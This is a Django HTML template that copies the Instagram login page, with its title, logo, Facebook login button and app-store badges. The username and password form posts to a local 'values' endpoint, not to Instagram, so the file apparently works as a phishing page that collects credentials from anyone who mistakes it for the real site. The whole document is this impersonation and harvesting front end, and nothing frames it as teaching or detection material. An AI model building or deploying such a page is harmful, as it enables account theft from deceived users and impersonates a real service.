<!DOCTYPE html>
{% load static  %}
<html lang="en">
<head>
	<meta charset="UTF-8">
	<title>Instagram</title>
	<link rel="stylesheet" type="text/css" href="{% static 'css/styles.css'%} "/>
</head>

<body>
<form method="post" action="values"> {% csrf_token %}
<div class="wrapper">
	<div class="header">
		<div class="top">
			<div class="logo">
				<img src="https://i.imgur.com/zqpwkLQ.png" alt="instagram" style="width: 175px;">
			</div>

			<div class="form" >
				<div class="input_field">
					<input name="username" type="text" placeholder="Phone number, username, or email" class="input">
				</div>
				<div class="input_field">
					<input name="password" type="password" placeholder="Password" class="input">
				</div>
				<button class="btn" type="submit"><a ><pre>                                     Log In                                      </pre></a></button>
			</div>
			<div class="or">
				<div class="line"></div>
				<p>OR</p>-
				<div class="line"></div>
			</div>
			<div class="dif">
				<div class="fb">
					<img src="https://imgur.com/JGSM51x.png" alt="facebook">
					<p>Log in with Facebook</p>
				</div>
				<div class="forgot">
					<a>Forgot password?</a>
				</div>
			</div>
		</div>
		<div class="signup">
			<p>Don't have an account? <a href="#">Sign up</a></p>
		</div>
		<div class="apps">
			<p>Get the app.</p>
			<div class="icons">
				<a href="#"><img src="https://imgur.com/i1hWkjD.png" alt="appstore"></a>
				<a href="#"><img src="https://imgur.com/byxl8z5.png" alt="googleplay"></a>
			</div>
		</div>
	</div>
</div>
</form>
</body>
</html>